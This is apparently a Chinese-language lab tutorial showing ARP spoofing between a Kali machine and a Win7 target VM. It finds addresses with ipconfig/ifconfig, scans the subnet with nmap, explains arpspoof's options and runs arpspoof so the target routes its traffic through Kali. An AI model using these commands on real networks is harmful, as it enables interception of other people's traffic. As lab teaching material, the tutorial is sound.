ARP欺骗

139 阅读1分钟

查看靶机win7和kali的ip地址和MAC地址

win7在命令行输入 ipconfig /all

image.png

kali中输入ifconfig

image.png

win7在命令行输入arp -a获取网关的ip,可以看到网关对应的MAC地址

image.png

使用 nmap 扫描在这一网段下所有存活的主机

Kali中输入:#nmap -v -n -sP 192.168.190.128/24,可以看到网关和win7都被扫出来了

image.png image.png

使用 arpspoof 工具开始 ARP 欺骗

arpspoof用法 arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host

参数 -i interface  指定要使用的接口(即指定一块网卡)可以用命令 ip a 查看 网卡名称

-t target  指定一个特殊的、将被ARP毒化的主机(如果没有指定,则认为是局域网中所有主机)。重复可以指定多个主机,也就是-t 后面加上你要欺骗的主机ip或者是域名

host   host是你想要截获数据包的主机 (通常是网关)也就是骗他你是什么,通常骗他你是网关

在kali中输入arpspoof -i eth0 -t win7IP 网关IP ,这里我输入arpspoof -i eth0 -t 192.168.65.129 192.168.65.2这句话的意思是欺骗win7,我kali是网关,这样win7的流量都会流经kali

去win7看一下arp缓存表 arp-a,可以看到win7的网关MAC地址已经被修改成了kali的MAC 地址

image.png